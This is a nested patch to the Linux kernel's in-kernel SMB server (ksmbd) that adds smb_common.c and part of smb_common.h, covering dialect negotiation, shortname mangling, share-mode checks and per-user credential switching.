++int smb2_write(struct ksmbd_work *work);
++int smb2_flush(struct ksmbd_work *work);
++int smb2_cancel(struct ksmbd_work *work);
++int smb2_lock(struct ksmbd_work *work);
++int smb2_ioctl(struct ksmbd_work *work);
++int smb2_oplock_break(struct ksmbd_work *work);
++int smb2_notify(struct ksmbd_work *ksmbd_work);
++
++/*
++ * Get the body of the smb2 message excluding the 4 byte rfc1002 header
++ * from request/response buffer.
++ */
++static inline void *smb2_get_msg(void *buf)
++{
++	return buf + 4;
++}
++
++#endif	/* _SMB2PDU_H */
+diff --git a/fs/smb/server/smb_common.c b/fs/smb/server/smb_common.c
+new file mode 100644
+index 0000000000000..05d7f3e910bf4
+--- /dev/null
++++ b/fs/smb/server/smb_common.c
+@@ -0,0 +1,797 @@
++// SPDX-License-Identifier: GPL-2.0-or-later
++/*
++ *   Copyright (C) 2018 Samsung Electronics Co., Ltd.
++ *   Copyright (C) 2018 Namjae Jeon <linkinjeon@kernel.org>
++ */
++
++#include <linux/user_namespace.h>
++
++#include "smb_common.h"
++#include "server.h"
++#include "misc.h"
++#include "smbstatus.h"
++#include "connection.h"
++#include "ksmbd_work.h"
++#include "mgmt/user_session.h"
++#include "mgmt/user_config.h"
++#include "mgmt/tree_connect.h"
++#include "mgmt/share_config.h"
++
++/* for shortname implementation */
++static const char basechars[43] = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ_-!@#$%";
++#define MANGLE_BASE (sizeof(basechars) / sizeof(char) - 1)
++#define MAGIC_CHAR '~'
++#define PERIOD '.'
++#define mangle(V) ((char)(basechars[(V) % MANGLE_BASE]))
++
++struct smb_protocol {
++	int		index;
++	char		*name;
++	char		*prot;
++	__u16		prot_id;
++};
++
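++/*
++ * Each dialect string in an SMB1 NEGOTIATE starts with the buffer-format
++ * byte 0x02 ("\2") followed by a NUL-terminated name; smb1_protos lists
++ * the SMB2+ dialects a client may request that way.
++ */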
++static struct smb_protocol smb1_protos[] = {
++	{
++		SMB21_PROT,
++		"\2SMB 2.1",
++		"SMB2_10",
++		SMB21_PROT_ID
++	},
++	{
++		SMB2X_PROT,
++		"\2SMB 2.???",
++		"SMB2_22",
++		SMB2X_PROT_ID
++	},
++};
++
++static struct smb_protocol smb2_protos[] = {
++	{
++		SMB21_PROT,
++		"\2SMB 2.1",
++		"SMB2_10",
++		SMB21_PROT_ID
++	},
++	{
++		SMB30_PROT,
++		"\2SMB 3.0",
++		"SMB3_00",
++		SMB30_PROT_ID
++	},
++	{
++		SMB302_PROT,
++		"\2SMB 3.02",
++		"SMB3_02",
++		SMB302_PROT_ID
++	},
++	{
++		SMB311_PROT,
++		"\2SMB 3.1.1",
++		"SMB3_11",
++		SMB311_PROT_ID
++	},
++};
++
++unsigned int ksmbd_server_side_copy_max_chunk_count(void)
++{
++	return 256;
++}
++
++unsigned int ksmbd_server_side_copy_max_chunk_size(void)
++{
++	return (2U << 30) - 1;
++}
++
++unsigned int ksmbd_server_side_copy_max_total_size(void)
++{
++	return (2U << 30) - 1;
++}
++
++inline int ksmbd_min_protocol(void)
++{
++	return SMB21_PROT;
++}
++
++inline int ksmbd_max_protocol(void)
++{
++	return SMB311_PROT;
++}
++
++int ksmbd_lookup_protocol_idx(char *str)
++{
++	int offt = ARRAY_SIZE(smb1_protos) - 1;
++	int len = strlen(str);
++
++	while (offt >= 0) {
++		if (!strncmp(str, smb1_protos[offt].prot, len)) {
++			ksmbd_debug(SMB, "selected %s dialect idx = %d\n",
++				    smb1_protos[offt].prot, offt);
++			return smb1_protos[offt].index;
++		}
++		offt--;
++	}
++
++	offt = ARRAY_SIZE(smb2_protos) - 1;
++	while (offt >= 0) {
++		if (!strncmp(str, smb2_protos[offt].prot, len)) {
++			ksmbd_debug(SMB, "selected %s dialect idx = %d\n",
++				    smb2_protos[offt].prot, offt);
++			return smb2_protos[offt].index;
++		}
++		offt--;
++	}
++	return -1;
++}
++
++/**
++ * ksmbd_verify_smb_message() - check for valid smb2 request header
++ * @work:	smb work
++ *
++ * check for valid smb signature and packet direction (request/response)
++ *
++ * Return:      0 on success, otherwise -EINVAL
++ */
++int ksmbd_verify_smb_message(struct ksmbd_work *work)
++{
++	struct smb2_hdr *smb2_hdr = ksmbd_req_buf_next(work);
++	struct smb_hdr *hdr;
++
++	if (smb2_hdr->ProtocolId == SMB2_PROTO_NUMBER)
++		return ksmbd_smb2_check_message(work);
++
++	hdr = work->request_buf;
++	if (*(__le32 *)hdr->Protocol == SMB1_PROTO_NUMBER &&
++	    hdr->Command == SMB_COM_NEGOTIATE) {
++		work->conn->outstanding_credits++;
++		return 0;
++	}
++
++	return -EINVAL;
++}
++
++/**
++ * ksmbd_smb_request() - check for valid smb request type
++ * @conn:	connection instance
++ *
++ * Return:      true on success, otherwise false
++ */
++bool ksmbd_smb_request(struct ksmbd_conn *conn)
++{
++	__le32 *proto = (__le32 *)smb2_get_msg(conn->request_buf);
++
++	if (*proto == SMB2_COMPRESSION_TRANSFORM_ID) {
++		pr_err_ratelimited("smb2 compression not supported yet\n");
++		return false;
++	}
++
++	if (*proto != SMB1_PROTO_NUMBER &&
++	    *proto != SMB2_PROTO_NUMBER &&
++	    *proto != SMB2_TRANSFORM_PROTO_NUM)
++		return false;
++
++	return true;
++}
++
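++/*
++ * SMB2X_PROT is the "SMB 2.???" wildcard dialect; it is accepted
++ * whenever the configured min/max range allows any SMB2+ dialect.
++ */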
++static bool supported_protocol(int idx)
++{
++	if (idx == SMB2X_PROT &&
++	    (server_conf.min_protocol >= SMB21_PROT ||
++	     server_conf.max_protocol <= SMB311_PROT))
++		return true;
++
++	return (server_conf.min_protocol <= idx &&
++		idx <= server_conf.max_protocol);
++}
++
++static char *next_dialect(char *dialect, int *next_off, int bcount)
++{
++	dialect = dialect + *next_off;
++	*next_off = strnlen(dialect, bcount);
++	if (dialect[*next_off] != '\0')
++		return NULL;
++	return dialect;
++}
++
++static int ksmbd_lookup_dialect_by_name(char *cli_dialects, __le16 byte_count)
++{
++	int i, seq_num, bcount, next;
++	char *dialect;
++
++	for (i = ARRAY_SIZE(smb1_protos) - 1; i >= 0; i--) {
++		seq_num = 0;
++		next = 0;
++		dialect = cli_dialects;
++		bcount = le16_to_cpu(byte_count);
++		do {
++			dialect = next_dialect(dialect, &next, bcount);
++			if (!dialect)
++				break;
++			ksmbd_debug(SMB, "client requested dialect %s\n",
++				    dialect);
++			if (!strcmp(dialect, smb1_protos[i].name)) {
++				if (supported_protocol(smb1_protos[i].index)) {
++					ksmbd_debug(SMB,
++						    "selected %s dialect\n",
++						    smb1_protos[i].name);
++					if (smb1_protos[i].index == SMB1_PROT)
++						return seq_num;
++					return smb1_protos[i].prot_id;
++				}
++			}
++			seq_num++;
++			bcount -= (++next);
++		} while (bcount > 0);
++	}
++
++	return BAD_PROT_ID;
++}
++
++int ksmbd_lookup_dialect_by_id(__le16 *cli_dialects, __le16 dialects_count)
++{
++	int i;
++	int count;
++
++	for (i = ARRAY_SIZE(smb2_protos) - 1; i >= 0; i--) {
++		count = le16_to_cpu(dialects_count);
++		while (--count >= 0) {
++			ksmbd_debug(SMB, "client requested dialect 0x%x\n",
++				    le16_to_cpu(cli_dialects[count]));
++			if (le16_to_cpu(cli_dialects[count]) !=
++					smb2_protos[i].prot_id)
++				continue;
++
++			if (supported_protocol(smb2_protos[i].index)) {
++				ksmbd_debug(SMB, "selected %s dialect\n",
++					    smb2_protos[i].name);
++				return smb2_protos[i].prot_id;
++			}
++		}
++	}
++
++	return BAD_PROT_ID;
++}
++
++static int ksmbd_negotiate_smb_dialect(void *buf)
++{
++	int smb_buf_length = get_rfc1002_len(buf);
++	__le32 proto = ((struct smb2_hdr *)smb2_get_msg(buf))->ProtocolId;
++
++	if (proto == SMB2_PROTO_NUMBER) {
++		struct smb2_negotiate_req *req;
++		int smb2_neg_size =
++			offsetof(struct smb2_negotiate_req, Dialects);
++
++		req = (struct smb2_negotiate_req *)smb2_get_msg(buf);
++		if (smb2_neg_size > smb_buf_length)
++			goto err_out;
++
++		if (smb2_neg_size + le16_to_cpu(req->DialectCount) * sizeof(__le16) >
++		    smb_buf_length)
++			goto err_out;
++
++		return ksmbd_lookup_dialect_by_id(req->Dialects,
++						  req->DialectCount);
++	}
++
++	proto = *(__le32 *)((struct smb_hdr *)buf)->Protocol;
++	if (proto == SMB1_PROTO_NUMBER) {
++		struct smb_negotiate_req *req;
++
++		req = (struct smb_negotiate_req *)buf;
++		if (le16_to_cpu(req->ByteCount) < 2)
++			goto err_out;
++
++		if (offsetof(struct smb_negotiate_req, DialectsArray) - 4 +
++			le16_to_cpu(req->ByteCount) > smb_buf_length) {
++			goto err_out;
++		}
++
++		return ksmbd_lookup_dialect_by_name(req->DialectsArray,
++						    req->ByteCount);
++	}
++
++err_out:
++	return BAD_PROT_ID;
++}
++
++#define SMB_COM_NEGOTIATE_EX	0x0
++
++/**
++ * get_smb1_cmd_val() - get smb command value from smb header
++ * @work:	smb work containing smb header
++ *
++ * Return:      smb command value
++ */
++static u16 get_smb1_cmd_val(struct ksmbd_work *work)
++{
++	return SMB_COM_NEGOTIATE_EX;
++}
++
++/**
++ * init_smb1_rsp_hdr() - initialize smb negotiate response header
++ * @work:	smb work containing smb request
++ *
++ * Return:      0 on success, otherwise -EINVAL
++ */
++static int init_smb1_rsp_hdr(struct ksmbd_work *work)
++{
++	struct smb_hdr *rsp_hdr = (struct smb_hdr *)work->response_buf;
++	struct smb_hdr *rcv_hdr = (struct smb_hdr *)work->request_buf;
++
++	/*
++	 * Remove 4 byte direct TCP header.
++	 */
++	*(__be32 *)work->response_buf =
++		cpu_to_be32(sizeof(struct smb_hdr) - 4);
++
++	rsp_hdr->Command = SMB_COM_NEGOTIATE;
++	*(__le32 *)rsp_hdr->Protocol = SMB1_PROTO_NUMBER;
++	rsp_hdr->Flags = SMBFLG_RESPONSE;
++	rsp_hdr->Flags2 = SMBFLG2_UNICODE | SMBFLG2_ERR_STATUS |
++		SMBFLG2_EXT_SEC | SMBFLG2_IS_LONG_NAME;
++	rsp_hdr->Pid = rcv_hdr->Pid;
++	rsp_hdr->Mid = rcv_hdr->Mid;
++	return 0;
++}
++
++/**
++ * smb1_check_user_session() - check for valid session for a user
++ * @work:	smb work containing smb request buffer
++ *
++ * Return:      0 on success, otherwise error
++ */
++static int smb1_check_user_session(struct ksmbd_work *work)
++{
++	unsigned int cmd = work->conn->ops->get_cmd_val(work);
++
++	if (cmd == SMB_COM_NEGOTIATE_EX)
++		return 0;
++
++	return -EINVAL;
++}
++
++/**
++ * smb1_allocate_rsp_buf() - allocate response buffer for a command
++ * @work:	smb work containing smb request
++ *
++ * Return:      0 on success, otherwise -ENOMEM
++ */
++static int smb1_allocate_rsp_buf(struct ksmbd_work *work)
++{
++	work->response_buf = kmalloc(MAX_CIFS_SMALL_BUFFER_SIZE,
++			GFP_KERNEL | __GFP_ZERO);
++	work->response_sz = MAX_CIFS_SMALL_BUFFER_SIZE;
++
++	if (!work->response_buf) {
++		pr_err("Failed to allocate %u bytes buffer\n",
++				MAX_CIFS_SMALL_BUFFER_SIZE);
++		return -ENOMEM;
++	}
++
++	return 0;
++}
++
++static struct smb_version_ops smb1_server_ops = {
++	.get_cmd_val = get_smb1_cmd_val,
++	.init_rsp_hdr = init_smb1_rsp_hdr,
++	.allocate_rsp_buf = smb1_allocate_rsp_buf,
++	.check_user_session = smb1_check_user_session,
++};
++
++static int smb1_negotiate(struct ksmbd_work *work)
++{
++	return ksmbd_smb_negotiate_common(work, SMB_COM_NEGOTIATE);
++}
++
++static struct smb_version_cmds smb1_server_cmds[1] = {
++	[SMB_COM_NEGOTIATE_EX]	= { .proc = smb1_negotiate, },
++};
++
++static void init_smb1_server(struct ksmbd_conn *conn)
++{
++	conn->ops = &smb1_server_ops;
++	conn->cmds = smb1_server_cmds;
++	conn->max_cmds = ARRAY_SIZE(smb1_server_cmds);
++}
++
++void ksmbd_init_smb_server(struct ksmbd_work *work)
++{
++	struct ksmbd_conn *conn = work->conn;
++	__le32 proto;
++
++	if (!conn->need_neg)
++		return;
++
++	proto = *(__le32 *)((struct smb_hdr *)work->request_buf)->Protocol;
++	if (proto == SMB1_PROTO_NUMBER)
++		init_smb1_server(conn);
++	else
++		init_smb3_11_server(conn);
++}
++
++int ksmbd_populate_dot_dotdot_entries(struct ksmbd_work *work, int info_level,
++				      struct ksmbd_file *dir,
++				      struct ksmbd_dir_info *d_info,
++				      char *search_pattern,
++				      int (*fn)(struct ksmbd_conn *, int,
++						struct ksmbd_dir_info *,
++						struct ksmbd_kstat *))
++{
++	int i, rc = 0;
++	struct ksmbd_conn *conn = work->conn;
++	struct user_namespace *user_ns = file_mnt_user_ns(dir->filp);
++
++	for (i = 0; i < 2; i++) {
++		struct kstat kstat;
++		struct ksmbd_kstat ksmbd_kstat;
++		struct dentry *dentry;
++
++		if (!dir->dot_dotdot[i]) { /* fill dot entry info */
++			if (i == 0) {
++				d_info->name = ".";
++				d_info->name_len = 1;
++				dentry = dir->filp->f_path.dentry;
++			} else {
++				d_info->name = "..";
++				d_info->name_len = 2;
++				dentry = dir->filp->f_path.dentry->d_parent;
++			}
++
++			if (!match_pattern(d_info->name, d_info->name_len,
++					   search_pattern)) {
++				dir->dot_dotdot[i] = 1;
++				continue;
++			}
++
++			ksmbd_kstat.kstat = &kstat;
++			ksmbd_vfs_fill_dentry_attrs(work,
++						    user_ns,
++						    dentry,
++						    &ksmbd_kstat);
++			rc = fn(conn, info_level, d_info, &ksmbd_kstat);
++			if (rc)
++				break;
++			if (d_info->out_buf_len <= 0)
++				break;
++
++			dir->dot_dotdot[i] = 1;
++			if (d_info->flags & SMB2_RETURN_SINGLE_ENTRY) {
++				d_info->out_buf_len = 0;
++				break;
++			}
++		}
++	}
++
++	return rc;
++}
++
++/**
++ * ksmbd_extract_shortname() - get shortname from long filename
++ * @conn:	connection instance
++ * @longname:	source long filename
++ * @shortname:	destination short filename
++ *
++ * Return:	shortname length or 0 when source long name is '.' or '..'
++ * TODO: Though this function conforms to the 8.3 filename restrictions,
++ * the result differs from what Windows 7 produces; this needs checking.
++ */
++int ksmbd_extract_shortname(struct ksmbd_conn *conn, const char *longname,
++			    char *shortname)
++{
++	const char *p;
++	char base[9], extension[4];
++	char out[13] = {0};
++	int baselen = 0;
++	int extlen = 0, len = 0;
++	unsigned int csum = 0;
++	const unsigned char *ptr;
++	bool dot_present = true;
++
++	p = longname;
++	if ((*p == '.') || (!(strcmp(p, "..")))) {
++		/*no mangling required */
++		return 0;
++	}
++
++	p = strrchr(longname, '.');
++	if (p == longname) { /*name starts with a dot*/
++		strscpy(extension, "___", sizeof(extension));
++	} else {
++		if (p) {
++			p++;
++			while (*p && extlen < 3) {
++				if (*p != '.')
++					extension[extlen++] = toupper(*p);
++				p++;
++			}
++			extension[extlen] = '\0';
++		} else {
++			dot_present = false;
++		}
++	}
++
++	p = longname;
++	if (*p == '.') {
++		p++;
++		longname++;
++	}
++	while (*p && (baselen < 5)) {
++		if (*p != '.')
++			base[baselen++] = toupper(*p);
++		p++;
++	}
++
++	base[baselen] = MAGIC_CHAR;
++	memcpy(out, base, baselen + 1);
++
++	ptr = longname;
++	len = strlen(longname);
++	for (; len > 0; len--, ptr++)
++		csum += *ptr;
++
++	csum = csum % (MANGLE_BASE * MANGLE_BASE);
++	out[baselen + 1] = mangle(csum / MANGLE_BASE);
++	out[baselen + 2] = mangle(csum);
++	out[baselen + 3] = PERIOD;
++
++	if (dot_present)
++		memcpy(&out[baselen + 4], extension, 4);
++	else
++		out[baselen + 4] = '\0';
++	smbConvertToUTF16((__le16 *)shortname, out, PATH_MAX,
++			  conn->local_nls, 0);
++	len = strlen(out) * 2;
++	return len;
++}
++
++static int __smb2_negotiate(struct ksmbd_conn *conn)
++{
++	return (conn->dialect >= SMB20_PROT_ID &&
++		conn->dialect <= SMB311_PROT_ID);
++}
++
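++/*
++ * Build a minimal SMB1 NEGOTIATE response: one parameter word carrying the
++ * dialect index and an empty byte count, as SMB1 itself is not served.
++ */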
++static int smb_handle_negotiate(struct ksmbd_work *work)
++{
++	struct smb_negotiate_rsp *neg_rsp = work->response_buf;
++
++	ksmbd_debug(SMB, "Unsupported SMB1 protocol\n");
++
++	/* Add the 2-byte bcc and 2-byte DialectIndex. */
++	inc_rfc1001_len(work->response_buf, 4);
++	neg_rsp->hdr.Status.CifsError = STATUS_SUCCESS;
++
++	neg_rsp->hdr.WordCount = 1;
++	neg_rsp->DialectIndex = cpu_to_le16(work->conn->dialect);
++	neg_rsp->ByteCount = 0;
++	return 0;
++}
++
++int ksmbd_smb_negotiate_common(struct ksmbd_work *work, unsigned int command)
++{
++	struct ksmbd_conn *conn = work->conn;
++	int ret;
++
++	conn->dialect =
++		ksmbd_negotiate_smb_dialect(work->request_buf);
++	ksmbd_debug(SMB, "conn->dialect 0x%x\n", conn->dialect);
++
++	if (command == SMB2_NEGOTIATE_HE) {
++		ret = smb2_handle_negotiate(work);
++		return ret;
++	}
++
++	if (command == SMB_COM_NEGOTIATE) {
++		if (__smb2_negotiate(conn)) {
++			init_smb3_11_server(conn);
++			init_smb2_neg_rsp(work);
++			ksmbd_debug(SMB, "Upgrade to SMB2 negotiation\n");
++			return 0;
++		}
++		return smb_handle_negotiate(work);
++	}
++
++	pr_err("Unknown SMB negotiation command: %u\n", command);
++	return -EINVAL;
++}
++
++enum SHARED_MODE_ERRORS {
++	SHARE_DELETE_ERROR,
++	SHARE_READ_ERROR,
++	SHARE_WRITE_ERROR,
++	FILE_READ_ERROR,
++	FILE_WRITE_ERROR,
++	FILE_DELETE_ERROR,
++};
++
++static const char * const shared_mode_errors[] = {
++	"Current access mode does not permit SHARE_DELETE",
++	"Current access mode does not permit SHARE_READ",
++	"Current access mode does not permit SHARE_WRITE",
++	"Desired access mode does not permit FILE_READ",
++	"Desired access mode does not permit FILE_WRITE",
++	"Desired access mode does not permit FILE_DELETE",
++};
++
++static void smb_shared_mode_error(int error, struct ksmbd_file *prev_fp,
++				  struct ksmbd_file *curr_fp)
++{
++	ksmbd_debug(SMB, "%s\n", shared_mode_errors[error]);
++	ksmbd_debug(SMB, "Current mode: 0x%x Desired mode: 0x%x\n",
++		    prev_fp->saccess, curr_fp->daccess);
++}
++
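++/*
++ * Compare the new open (@curr_fp) against every existing open of the same
++ * inode; return -EPERM if the desired access and share modes conflict,
++ * 0 otherwise.
++ */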
++int ksmbd_smb_check_shared_mode(struct file *filp, struct ksmbd_file *curr_fp)
++{
++	int rc = 0;
++	struct ksmbd_file *prev_fp;
++
++	/*
++	 * Look up fp in the master fp list, and check the desired access and
++	 * share mode between the previous open and the current open.
++	 */
++	read_lock(&curr_fp->f_ci->m_lock);
++	list_for_each_entry(prev_fp, &curr_fp->f_ci->m_fp_list, node) {
++		if (file_inode(filp) != file_inode(prev_fp->filp))
++			continue;
++
++		if (filp == prev_fp->filp)
++			continue;
++
++		if (ksmbd_stream_fd(prev_fp) && ksmbd_stream_fd(curr_fp))
++			if (strcmp(prev_fp->stream.name, curr_fp->stream.name))
++				continue;
++
++		if (prev_fp->attrib_only != curr_fp->attrib_only)
++			continue;
++
++		if (!(prev_fp->saccess & FILE_SHARE_DELETE_LE) &&
++		    curr_fp->daccess & FILE_DELETE_LE) {
++			smb_shared_mode_error(SHARE_DELETE_ERROR,
++					      prev_fp,
++					      curr_fp);
++			rc = -EPERM;
++			break;
++		}
++
++		/*
++		 * Only the FILE_SHARE_DELETE check above applies between a
++		 * stream open and a normal file open; skip the other checks.
++		 */
++		if (ksmbd_stream_fd(prev_fp) && !ksmbd_stream_fd(curr_fp))
++			continue;
++
++		if (!(prev_fp->saccess & FILE_SHARE_READ_LE) &&
++		    curr_fp->daccess & (FILE_EXECUTE_LE | FILE_READ_DATA_LE)) {
++			smb_shared_mode_error(SHARE_READ_ERROR,
++					      prev_fp,
++					      curr_fp);
++			rc = -EPERM;
++			break;
++		}
++
++		if (!(prev_fp->saccess & FILE_SHARE_WRITE_LE) &&
++		    curr_fp->daccess & (FILE_WRITE_DATA_LE | FILE_APPEND_DATA_LE)) {
++			smb_shared_mode_error(SHARE_WRITE_ERROR,
++					      prev_fp,
++					      curr_fp);
++			rc = -EPERM;
++			break;
++		}
++
++		if (prev_fp->daccess & (FILE_EXECUTE_LE | FILE_READ_DATA_LE) &&
++		    !(curr_fp->saccess & FILE_SHARE_READ_LE)) {
++			smb_shared_mode_error(FILE_READ_ERROR,
++					      prev_fp,
++					      curr_fp);
++			rc = -EPERM;
++			break;
++		}
++
++		if (prev_fp->daccess & (FILE_WRITE_DATA_LE | FILE_APPEND_DATA_LE) &&
++		    !(curr_fp->saccess & FILE_SHARE_WRITE_LE)) {
++			smb_shared_mode_error(FILE_WRITE_ERROR,
++					      prev_fp,
++					      curr_fp);
++			rc = -EPERM;
++			break;
++		}
++
++		if (prev_fp->daccess & FILE_DELETE_LE &&
++		    !(curr_fp->saccess & FILE_SHARE_DELETE_LE)) {
++			smb_shared_mode_error(FILE_DELETE_ERROR,
++					      prev_fp,
++					      curr_fp);
++			rc = -EPERM;
++			break;
++		}
++	}
++	read_unlock(&curr_fp->f_ci->m_lock);
++
++	return rc;
++}
++
++bool is_asterisk(char *p)
++{
++	return p && p[0] == '*';
++}
++
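++/*
++ * Temporarily switch the worker's fsuid/fsgid (and supplementary groups)
++ * to the session user, honoring any per-share force_uid/force_gid, and
++ * drop filesystem capabilities for non-root ids. Undone by
++ * ksmbd_revert_fsids().
++ */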
++int ksmbd_override_fsids(struct ksmbd_work *work)
++{
++	struct ksmbd_session *sess = work->sess;
++	struct ksmbd_share_config *share = work->tcon->share_conf;
++	struct cred *cred;
++	struct group_info *gi;
++	unsigned int uid;
++	unsigned int gid;
++
++	uid = user_uid(sess->user);
++	gid = user_gid(sess->user);
++	if (share->force_uid != KSMBD_SHARE_INVALID_UID)
++		uid = share->force_uid;
++	if (share->force_gid != KSMBD_SHARE_INVALID_GID)
++		gid = share->force_gid;
++
++	cred = prepare_kernel_cred(NULL);
++	if (!cred)
++		return -ENOMEM;
++
++	cred->fsuid = make_kuid(&init_user_ns, uid);
++	cred->fsgid = make_kgid(&init_user_ns, gid);
++
++	gi = groups_alloc(0);
++	if (!gi) {
++		abort_creds(cred);
++		return -ENOMEM;
++	}
++	set_groups(cred, gi);
++	put_group_info(gi);
++
++	if (!uid_eq(cred->fsuid, GLOBAL_ROOT_UID))
++		cred->cap_effective = cap_drop_fs_set(cred->cap_effective);
++
++	WARN_ON(work->saved_cred);
++	work->saved_cred = override_creds(cred);
++	if (!work->saved_cred) {
++		abort_creds(cred);
++		return -EINVAL;
++	}
++	return 0;
++}
++
++void ksmbd_revert_fsids(struct ksmbd_work *work)
++{
++	const struct cred *cred;
++
++	WARN_ON(!work->saved_cred);
++
++	cred = current_cred();
++	revert_creds(work->saved_cred);
++	put_cred(cred);
++	work->saved_cred = NULL;
++}
++
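++/*
++ * Expand any GENERIC_{READ,WRITE,EXECUTE,ALL} bits in the desired access
++ * mask into the specific FILE_* rights they imply.
++ */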
++__le32 smb_map_generic_desired_access(__le32 daccess)
++{
++	if (daccess & FILE_GENERIC_READ_LE) {
++		daccess |= cpu_to_le32(GENERIC_READ_FLAGS);
++		daccess &= ~FILE_GENERIC_READ_LE;
++	}
++
++	if (daccess & FILE_GENERIC_WRITE_LE) {
++		daccess |= cpu_to_le32(GENERIC_WRITE_FLAGS);
++		daccess &= ~FILE_GENERIC_WRITE_LE;
++	}
++
++	if (daccess & FILE_GENERIC_EXECUTE_LE) {
++		daccess |= cpu_to_le32(GENERIC_EXECUTE_FLAGS);
++		daccess &= ~FILE_GENERIC_EXECUTE_LE;
++	}
++
++	if (daccess & FILE_GENERIC_ALL_LE) {
++		daccess |= cpu_to_le32(GENERIC_ALL_FLAGS);
++		daccess &= ~FILE_GENERIC_ALL_LE;
++	}
++
++	return daccess;
++}
+diff --git a/fs/smb/server/smb_common.h b/fs/smb/server/smb_common.h
+new file mode 100644
+index 0000000000000..e63d2a4f466b5
+--- /dev/null
++++ b/fs/smb/server/smb_common.h
+@@ -0,0 +1,468 @@
++/* SPDX-License-Identifier: GPL-2.0-or-later */
++/*
++ *   Copyright (C) 2018 Samsung Electronics Co., Ltd.
++ */
++
++#ifndef __SMB_COMMON_H__
++#define __SMB_COMMON_H__
++
++#include <linux/kernel.h>
++
++#include "glob.h"
++#include "nterr.h"
++#include "../common/smb2pdu.h"
++#include "smb2pdu.h"
++
++/* ksmbd-specific ERRNO */
++#define ESHARE			50000
++
++#define SMB1_PROT		0
++#define SMB2_PROT		1
++#define SMB21_PROT		2
++/* multi-protocol negotiate request */
++#define SMB2X_PROT		3
++#define SMB30_PROT		4
++#define SMB302_PROT		5
++#define SMB311_PROT		6
++#define BAD_PROT		0xFFFF
++
++#define SMB1_VERSION_STRING	"1.0"
++#define SMB20_VERSION_STRING	"2.0"
++#define SMB21_VERSION_STRING	"2.1"
++#define SMB30_VERSION_STRING	"3.0"
++#define SMB302_VERSION_STRING	"3.02"
++#define SMB311_VERSION_STRING	"3.1.1"
++
++#define SMB_ECHO_INTERVAL	(60 * HZ)
++
++#define CIFS_DEFAULT_IOSIZE	(64 * 1024)
++#define MAX_CIFS_SMALL_BUFFER_SIZE 448 /* big enough for most */
++
++#define MAX_STREAM_PROT_LEN	0x00FFFFFF
++
++/* Responses when opening a file. */
++#define F_SUPERSEDED	0
++#define F_OPENED	1
++#define F_CREATED	2
++#define F_OVERWRITTEN	3
++
++/*
++ * File Attribute flags
++ */
++#define ATTR_POSIX_SEMANTICS		0x01000000
++#define ATTR_BACKUP_SEMANTICS		0x02000000
++#define ATTR_DELETE_ON_CLOSE		0x04000000
++#define ATTR_SEQUENTIAL_SCAN		0x08000000
++#define ATTR_RANDOM_ACCESS		0x10000000
++#define ATTR_NO_BUFFERING		0x20000000
++#define ATTR_WRITE_THROUGH		0x80000000
++
++/* List of FileSystemAttributes - see 2.5.1 of MS-FSCC */
++#define FILE_SUPPORTS_SPARSE_VDL	0x10000000 /* faster nonsparse extend */
++#define FILE_SUPPORTS_BLOCK_REFCOUNTING	0x08000000 /* allow ioctl dup extents */
++#define FILE_SUPPORT_INTEGRITY_STREAMS	0x04000000
++#define FILE_SUPPORTS_USN_JOURNAL	0x02000000
++#define FILE_SUPPORTS_OPEN_BY_FILE_ID	0x01000000
++#define FILE_SUPPORTS_EXTENDED_ATTRIBUTES 0x00800000
++#define FILE_SUPPORTS_HARD_LINKS	0x00400000
++#define FILE_SUPPORTS_TRANSACTIONS	0x00200000
++#define FILE_SEQUENTIAL_WRITE_ONCE	0x00100000
++#define FILE_READ_ONLY_VOLUME		0x00080000
++#define FILE_NAMED_STREAMS		0x00040000
++#define FILE_SUPPORTS_ENCRYPTION	0x00020000
++#define FILE_SUPPORTS_OBJECT_IDS	0x00010000
++#define FILE_VOLUME_IS_COMPRESSED	0x00008000
++#define FILE_SUPPORTS_REMOTE_STORAGE	0x00000100
++#define FILE_SUPPORTS_REPARSE_POINTS	0x00000080
++#define FILE_SUPPORTS_SPARSE_FILES	0x00000040
++#define FILE_VOLUME_QUOTAS		0x00000020
++#define FILE_FILE_COMPRESSION		0x00000010
++#define FILE_PERSISTENT_ACLS		0x00000008
++#define FILE_UNICODE_ON_DISK		0x00000004
++#define FILE_CASE_PRESERVED_NAMES	0x00000002
++#define FILE_CASE_SENSITIVE_SEARCH	0x00000001
++
++#define FILE_READ_DATA        0x00000001  /* Data can be read from the file   */
++#define FILE_WRITE_DATA       0x00000002  /* Data can be written to the file  */
++#define FILE_APPEND_DATA      0x00000004  /* Data can be appended to the file */
++#define FILE_READ_EA          0x00000008  /* Extended attributes associated   */
++/* with the file can be read        */
++#define FILE_WRITE_EA         0x00000010  /* Extended attributes associated   */
++/* with the file can be written     */
++#define FILE_EXECUTE          0x00000020  /*Data can be read into memory from */
++/* the file using system paging I/O */
++#define FILE_DELETE_CHILD     0x00000040
++#define FILE_READ_ATTRIBUTES  0x00000080  /* Attributes associated with the   */
++/* file can be read                 */
++#define FILE_WRITE_ATTRIBUTES 0x00000100  /* Attributes associated with the   */
++/* file can be written              */
++#define DELETE                0x00010000  /* The file can be deleted          */
++#define READ_CONTROL          0x00020000  /* The access control list and      */
++/* ownership associated with the    */
++/* file can be read                 */
++#define WRITE_DAC             0x00040000  /* The access control list and      */
++/* ownership associated with the    */
++/* file can be written.             */
++#define WRITE_OWNER           0x00080000  /* Ownership information associated */
++/* with the file can be written     */
++#define SYNCHRONIZE           0x00100000  /* The file handle can waited on to */
++/* synchronize with the completion  */
++/* of an input/output request       */
++#define GENERIC_ALL           0x10000000
++#define GENERIC_EXECUTE       0x20000000
++#define GENERIC_WRITE         0x40000000
++#define GENERIC_READ          0x80000000
++/*
++ * In summary, the relevant file access flags from CIFS are file_read_data,
++ * file_write_data, file_execute, file_read_attributes, write_dac, and
++ * delete.
++ */
++
++#define SET_FILE_READ_RIGHTS (FILE_READ_DATA | FILE_READ_EA \
++		| FILE_READ_ATTRIBUTES \
++		| DELETE | READ_CONTROL | WRITE_DAC \
++		| WRITE_OWNER | SYNCHRONIZE)
++#define SET_FILE_WRITE_RIGHTS (FILE_WRITE_DATA | FILE_APPEND_DATA \
++		| FILE_WRITE_EA \
++		| FILE_DELETE_CHILD \
++		| FILE_WRITE_ATTRIBUTES \
++		| DELETE | READ_CONTROL | WRITE_DAC \
++		| WRITE_OWNER | SYNCHRONIZE)
++#define SET_FILE_EXEC_RIGHTS (FILE_READ_EA | FILE_WRITE_EA | FILE_EXECUTE \
++		| FILE_READ_ATTRIBUTES \
++		| FILE_WRITE_ATTRIBUTES \
++		| DELETE | READ_CONTROL | WRITE_DAC \
++		| WRITE_OWNER | SYNCHRONIZE)
++
